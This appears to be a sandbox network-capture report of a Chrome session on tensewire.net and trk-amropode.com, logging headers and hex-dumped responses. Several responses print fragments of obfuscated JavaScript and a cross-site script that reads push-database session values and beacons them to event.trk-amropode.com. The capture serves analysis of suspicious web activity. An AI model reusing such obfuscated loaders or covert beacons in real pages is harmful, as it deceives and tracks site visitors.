                              33192.168.2.449775104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:16 UTC389OUTGET / HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:17 UTC822INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:17 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              pragma: no-cache
                              vary: Accept-Encoding,User-Agent,User-Agent
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Wk4hTVMMcCOu3rFEDkWgKrQJrOZnN4iVeR3rf8K8pWFVsKTb6FpTJfZHkq5ZZnpncv%2BXg7xyPQagROi8QWas%2Bl%2FybwacpzpGynKHCGFKiqORq%2By268g%2FEa9gPhWVSkD"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b8c1f5b1395-ATL
                              2024-04-25 18:22:17 UTC547INData Raw: 37 30 63 0d 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 70 75 73 68 53 74 61 74 65 28 7b 7d 2c 22 22 2c 20 22 2f 33 61 33 36 65 66 32 39 35 39 65 38 37 62 32 63 61 32 37 63 38 66 30 34 62 37 32 36 61 33 34 33 22 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 65 62 61 28 5f 30 78 34 63 30 33 64 32 2c 5f 30 78 65 34 62 30 38 37 29 7b 63 6f 6e 73 74 20 5f 30 78 33 63 63 66 32 64 3d 5f 30 78 33 63 63 66 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 34 65 62 61 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 65 62 61 32 63 2c 5f 30 78 31 33 64 66 66 37 29 7b 5f 30 78 34 65 62 61 32 63 3d 5f 30 78 34 65 62 61 32 63 2d 30 78 31 34 66 3b 6c 65 74 20 5f 30 78 32 32 61 35 31 36 3d 5f 30 78 33 63 63 66 32 64 5b 5f 30 78 34 65 62 61 32 63 5d 3b 72 65 74
                              Data Ascii: 70c<script>window.history.pushState({},"", "/3a36ef2959e87b2ca27c8f04b726a343");function _0x4eba(_0x4c03d2,_0xe4b087){const _0x3ccf2d=_0x3ccf();return _0x4eba=function(_0x4eba2c,_0x13dff7){_0x4eba2c=_0x4eba2c-0x14f;let _0x22a516=_0x3ccf2d[_0x4eba2c];ret
                              2024-04-25 18:22:17 UTC1264INData Raw: 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 35 39 29 29 2f 30 78 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 35 30 29 29 2f 30 78 36 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 36 32 29 29 2f 30 78 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 34 66 29 29 2f 30 78 38 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 36 30 29 29 2f 30 78 39 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 35 61 29 29 2f 30 78 61 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 35 32 29 29 2f 30 78 62 29 3b 69 66 28 5f 30 78 62 66 31 38 61 31 3d 3d 3d 5f 30 78 66 66 66 38 31 34 29 62 72 65 61 6b 3b 65 6c 73 65 20 5f
                              Data Ascii: (_0x61528b(0x159))/0x5*(-parseInt(_0x61528b(0x150))/0x6)+parseInt(_0x61528b(0x162))/0x7*(-parseInt(_0x61528b(0x14f))/0x8)+-parseInt(_0x61528b(0x160))/0x9+parseInt(_0x61528b(0x15a))/0xa*(parseInt(_0x61528b(0x152))/0xb);if(_0xbf18a1===_0xfff814)break;else _
                              2024-04-25 18:22:17 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              34192.168.2.449778104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:17 UTC410OUTGET /assets/images/ci1.jpg HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:17 UTC832INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:17 GMT
                              Content-Type: image/jpeg
                              Content-Length: 1990
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Tue, 30 Apr 2024 12:13:01 GMT
                              last-modified: Tue, 03 Jan 2023 16:27:10 GMT
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              vary: User-Agent,User-Agent
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: HIT
                              Age: 194956
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NZ%2B%2FlRbQWB77Buv5jWtYa4qyEYTUC9rya8J1f0TvFI1WlMYNg1UeR7PfAz5MLNA4d4AOJ7FNbLUwBO1fyCjJSx3vrDu%2BODEc11r1j3KBhy%2B0IlcIWpOEGUzfoH%2BmqylG"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b8ded078bba-ATL
                              2024-04-25 18:22:17 UTC537INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                              Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                              2024-04-25 18:22:17 UTC1369INData Raw: 29 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 34 41 31 37 36 37 41 33 38 42 38 30 31 31 45 44 38 31 37 41 44 45 42 39 39 41 32 37 44 39 37 39 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 34 41 31 37 36 37 41 34 38 42 38 30 31 31 45 44 38 31 37 41 44 45 42 39 39 41 32 37 44 39 37 39 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 34 41 31 37 36 37 41 31 38 42 38 30 31 31 45 44 38 31 37 41 44 45 42 39 39 41 32 37 44 39 37 39 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 34 41 31 37 36 37 41 32 38 42 38 30 31 31 45 44 38 31 37 41 44 45 42 39 39 41
                              Data Ascii: )" xmpMM:InstanceID="xmp.iid:4A1767A38B8011ED817ADEB99A27D979" xmpMM:DocumentID="xmp.did:4A1767A48B8011ED817ADEB99A27D979"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4A1767A18B8011ED817ADEB99A27D979" stRef:documentID="xmp.did:4A1767A28B8011ED817ADEB99A
                              2024-04-25 18:22:17 UTC84INData Raw: d4 5e 4f 9d 3f 23 cf 26 7e 70 ff 00 db 3a bc 06 be 1f 4d 3a 5f fc 3c bd 3d 0d d7 d3 d2 7a b8 51 45 47 d4 da e8 73 8c 8f e1 a6 d7 f8 9b 3a 35 6c e1 4e 39 17 5c fa ba 07 56 af da e1 45 15 39 33 f5 27 1e 5e 87 3c ff 00 47 c5 fe 9f e2 a2 8a 29 81 3f ff d9
                              Data Ascii: ^O?#&~p:M:_<=zQEGs:5lN9\VE93'^<G)?


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              35192.168.2.449779104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:17 UTC411OUTGET /assets/images/ci21.jpg HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:17 UTC834INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:17 GMT
                              Content-Type: image/jpeg
                              Content-Length: 2003
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Tue, 30 Apr 2024 14:33:44 GMT
                              last-modified: Tue, 03 Jan 2023 16:27:10 GMT
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              vary: User-Agent,User-Agent
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: HIT
                              Age: 186513
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9eLAH8BaCty%2BZGYC5yhwZtu5z5IMUn3t7ctySOgxz%2Bp6m7twHsDF1Jyd4dv4%2FUY%2FUHIRK8mbbJApuSe1%2FqFE36gm16FX6Ld4Q8rEvQuh04ef9tYoqfRFnj7HTbYb%2B0gO"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b8dec1aade4-ATL
                              2024-04-25 18:22:17 UTC535INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                              Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                              2024-04-25 18:22:17 UTC1369INData Raw: 77 73 29 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 37 46 42 38 32 46 36 43 38 42 37 46 31 31 45 44 38 44 43 44 44 42 42 42 46 39 34 46 35 31 30 34 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 37 46 42 38 32 46 36 44 38 42 37 46 31 31 45 44 38 44 43 44 44 42 42 42 46 39 34 46 35 31 30 34 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 37 46 42 38 32 46 36 41 38 42 37 46 31 31 45 44 38 44 43 44 44 42 42 42 46 39 34 46 35 31 30 34 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 37 46 42 38 32 46 36 42 38 42 37 46 31 31 45 44 38 44 43 44 44 42 42 42
                              Data Ascii: ws)" xmpMM:InstanceID="xmp.iid:7FB82F6C8B7F11ED8DCDDBBBF94F5104" xmpMM:DocumentID="xmp.did:7FB82F6D8B7F11ED8DCDDBBBF94F5104"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7FB82F6A8B7F11ED8DCDDBBBF94F5104" stRef:documentID="xmp.did:7FB82F6B8B7F11ED8DCDDBBB
                              2024-04-25 18:22:17 UTC99INData Raw: 2b 3e 06 5e a1 ec 69 aa f3 69 ae ea c6 ea bf 7f 3f 37 3a f3 72 f9 bb e8 a2 9e f8 3c f1 c9 83 36 93 6b a0 f9 3e 17 af 46 c3 ff 00 9b 8f f8 2b cb fc 23 e2 ec a2 8a e8 ea 6d f0 8c 1f d5 5f 75 87 cb f7 af f8 9c bb bb bb 6a 8a 7f ce 3a e8 35 d3 cd 45 15 9e c3 7d 65 4f cc e5 f8 7f 2d 14 51 42 29 ff d9
                              Data Ascii: +>^ii?7:r<6k>F+#m_uj:5E}eO-QB)


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              36192.168.2.449777104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:17 UTC421OUTGET /3a36ef2959e87b2ca27c8f04b726a343 HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:17 UTC824INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:17 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              pragma: no-cache
                              vary: Accept-Encoding,User-Agent,User-Agent
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vDb3edZ%2BmBJcmh%2BkRGArSt8NE12z9MtoiyhPHUkEWHZLKdnYkcv6W%2B0Rkef0te33kZRP8afVULc%2F2BA%2FmiVpxMOxwifA6B9kEnpQxM61QUPju48ExgOlHFv%2BEqqqAqwr"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b8ded89b0ed-ATL
                              2024-04-25 18:22:17 UTC545INData Raw: 37 30 63 0d 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 70 75 73 68 53 74 61 74 65 28 7b 7d 2c 22 22 2c 20 22 2f 33 61 33 36 65 66 32 39 35 39 65 38 37 62 32 63 61 32 37 63 38 66 30 34 62 37 32 36 61 33 34 33 22 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 65 62 61 28 5f 30 78 34 63 30 33 64 32 2c 5f 30 78 65 34 62 30 38 37 29 7b 63 6f 6e 73 74 20 5f 30 78 33 63 63 66 32 64 3d 5f 30 78 33 63 63 66 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 34 65 62 61 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 65 62 61 32 63 2c 5f 30 78 31 33 64 66 66 37 29 7b 5f 30 78 34 65 62 61 32 63 3d 5f 30 78 34 65 62 61 32 63 2d 30 78 31 34 66 3b 6c 65 74 20 5f 30 78 32 32 61 35 31 36 3d 5f 30 78 33 63 63 66 32 64 5b 5f 30 78 34 65 62 61 32 63 5d 3b 72 65 74
                              Data Ascii: 70c<script>window.history.pushState({},"", "/3a36ef2959e87b2ca27c8f04b726a343");function _0x4eba(_0x4c03d2,_0xe4b087){const _0x3ccf2d=_0x3ccf();return _0x4eba=function(_0x4eba2c,_0x13dff7){_0x4eba2c=_0x4eba2c-0x14f;let _0x22a516=_0x3ccf2d[_0x4eba2c];ret
                              2024-04-25 18:22:17 UTC1266INData Raw: 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 35 39 29 29 2f 30 78 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 35 30 29 29 2f 30 78 36 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 36 32 29 29 2f 30 78 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 34 66 29 29 2f 30 78 38 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 36 30 29 29 2f 30 78 39 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 35 61 29 29 2f 30 78 61 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 36 31 35 32 38 62 28 30 78 31 35 32 29 29 2f 30 78 62 29 3b 69 66 28 5f 30 78 62 66 31 38 61 31 3d 3d 3d 5f 30 78 66 66 66 38 31 34 29 62 72 65 61 6b 3b 65 6c 73 65
                              Data Ascii: nt(_0x61528b(0x159))/0x5*(-parseInt(_0x61528b(0x150))/0x6)+parseInt(_0x61528b(0x162))/0x7*(-parseInt(_0x61528b(0x14f))/0x8)+-parseInt(_0x61528b(0x160))/0x9+parseInt(_0x61528b(0x15a))/0xa*(parseInt(_0x61528b(0x152))/0xb);if(_0xbf18a1===_0xfff814)break;else
                              2024-04-25 18:22:17 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              37192.168.2.449780104.21.22.1404435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:17 UTC431OUTGET //scripts/pg/v9e118mez8 HTTP/1.1
                              Host: trk-amropode.com
                              Connection: keep-alive
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: cross-site
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Referer: https://tensewire.net/
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-04-25 18:22:17 UTC1344INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:17 GMT
                              Content-Type: application/javascript;charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              expires: 0
                              Cache-Control: max-age=14400, must-revalidate
                              x-xss-protection: 1; mode=block
                              pragma: no-cache
                              x-frame-options: SAMEORIGIN
                              referrer-policy: strict-origin-when-cross-origin
                              content-security-policy: default-src 'self'; frame-src 'self' data:; connect-src 'self' https://cdn-media-2020.s3.amazonaws.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://storage.googleapis.com; style-src 'self' 'unsafe-inline'; img-src * 'self' https://* blob: data:; font-src 'self' data:
                              vary: Origin
                              vary: Access-Control-Request-Method
                              vary: Access-Control-Request-Headers
                              x-content-type-options: nosniff
                              permissions-policy: camera=(), fullscreen=(self), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), sync-xhr=()
                              CF-Cache-Status: HIT
                              Age: 5260
                              Last-Modified: Thu, 25 Apr 2024 16:54:37 GMT
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wlCv51gbhpUR3jA7mI2oGrzACdaCLLzcepDqNarA9XMLkOJIx%2BGxqAFuD6EpuxTfufo66%2FUKGJCeqEU9%2FzsUg3U12DfbzDVx9sFUvbZ%2BCAIU2cXlb84bFQJeo%2BhZVgV%2Fcd6s"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              2024-04-25 18:22:17 UTC62INData Raw: 43 46 2d 52 41 59 3a 20 38 37 61 30 35 62 39 30 34 66 35 31 38 38 33 31 2d 41 54 4c 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                              Data Ascii: CF-RAY: 87a05b904f518831-ATLalt-svc: h3=":443"; ma=86400
                              2024-04-25 18:22:17 UTC1369INData Raw: 31 66 35 31 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 61 29 7b 74 72 79 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 3d 45 7d 63 61 74 63 68 28 61 29 7b 7d 45 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 61 29 7b 69 66 28 73 65 6c 66 2e 69 6e 64 65 78 65 64 44 42 29 7b 76 61 72 20 62 3d 47 2e 61 70 70 6c 79 28 73 65 6c 66 2e 69 6e 64 65 78 65 64 44 42 2c 5b 22 70 75 73 68 50 6c 61 74 46 6f 72 6d 44 62 22 2c 32 5d 29 3b 62 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 65 72 72 6f 72 20 64 62 22 2b 62 2e 65 72 72 6f 72 29 2c 61 28 6e 75 6c 6c 29 7d 2c 62 2e 6f 6e 73 75 63 63 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 62 2e 72 65 73 75 6c 74 2c 64 3d 63
                              Data Ascii: 1f51(function(a,b){function c(a){try{console.log=E}catch(a){}E(a)}function d(a){if(self.indexedDB){var b=G.apply(self.indexedDB,["pushPlatFormDb",2]);b.onerror=function(){console.log("error db"+b.error),a(null)},b.onsuccess=function(){var c=b.result,d=c
                              2024-04-25 18:22:17 UTC1369INData Raw: 63 3d 61 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 61 29 7b 69 28 22 65 78 74 5f 64 62 5f 65 72 72 6f 72 22 2c 61 2c 6d 29 7d 7d 2c 64 2e 67 65 74 28 22 73 65 73 73 69 6f 6e 49 64 73 22 29 2e 6f 6e 73 75 63 63 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 29 74 72 79 7b 66 3d 61 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 61 29 7b 69 28 22 65 78 74 5f 64 62 5f 65 72 72 6f 72 22 2c 61 2c 6d 29 7d 7d 2c 64 2e 67 65 74 28 22 75 74 6d 48 61 73 68 22 29 2e 6f 6e 73 75 63 63 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 29 74 72 79 7b 6a 3d 61 2e 74 61 72 67 65 74 2e 72 65 73
                              Data Ascii: c=a.target.result.value}catch(a){i("ext_db_error",a,m)}},d.get("sessionIds").onsuccess=function(a){if(a.target.result)try{f=a.target.result.value}catch(a){i("ext_db_error",a,m)}},d.get("utmHash").onsuccess=function(a){if(a.target.result)try{j=a.target.res
                              2024-04-25 18:22:17 UTC1369INData Raw: 2c 63 29 7b 6c 65 74 20 64 3b 74 72 79 7b 64 3d 46 2e 61 70 70 6c 79 28 74 68 69 73 2c 62 29 7d 63 61 74 63 68 7b 7d 6c 65 74 20 65 3d 62 2e 6d 65 73 73 61 67 65 3b 65 3d 6e 75 6c 6c 21 3d 64 26 26 22 7b 7d 22 21 3d 3d 64 3f 64 3a 6e 75 6c 6c 3d 3d 65 3f 62 3a 65 2b 22 3a 3a 22 2b 62 2e 73 74 61 63 6b 3b 6c 65 74 20 66 3d 22 68 74 74 70 73 3a 2f 2f 65 76 65 6e 74 2e 74 72 6b 2d 61 6d 72 6f 70 6f 64 65 2e 63 6f 6d 2f 72 65 67 69 73 74 65 72 2f 65 76 65 6e 74 2f 76 39 65 31 31 38 6d 65 7a 38 3f 65 76 65 6e 74 3d 22 2b 75 28 61 29 2b 22 26 65 72 72 6f 72 3d 22 2b 75 28 65 29 2b 22 26 76 65 72 73 69 6f 6e 3d 22 2b 63 3b 66 65 74 63 68 28 66 2c 7b 6d 65 74 68 6f 64 3a 22 67 65 74 22 2c 68 65 61 64 65 72 73 3a 7b 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 3a 22
                              Data Ascii: ,c){let d;try{d=F.apply(this,b)}catch{}let e=b.message;e=null!=d&&"{}"!==d?d:null==e?b:e+"::"+b.stack;let f="https://event.trk-amropode.com/register/event/v9e118mez8?event="+u(a)+"&error="+u(e)+"&version="+c;fetch(f,{method:"get",headers:{"Content-type":"
                              2024-04-25 18:22:17 UTC1369INData Raw: 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 61 6d 65 3d 22 41 72 72 61 79 22 2c 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 61 6d 65 3d 22 4f 62 6a 65 63 74 22 2c 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 21 3d 3d 52 65 73 70 6f 6e 73 65 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 21 3d 3d 41 72 72 61 79 26 26 22 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 22 21 3d 3d 62 26 26 22 66 6f 72 45 61 63 68 22 21 3d 3d 62 26 26 22 70 75 73 68 22 21 3d 3d 62 26 26 22 73 74 61 74 75 73 22 21 3d 3d 62 26 26 22 41 72 72 61 79 22 21 3d 3d 61 2e 6e 61 6d 65 26 26 22 52 65 73 70 6f 6e 73 65 22 21 3d 3d 61 2e 6e 61 6d 65 26 26 22 6c 6f 67 22 21 3d 3d 62 29 72 65 74 75 72 6e 22 77 72 69 74 61 62 6c 65 22 69 6e 20 63
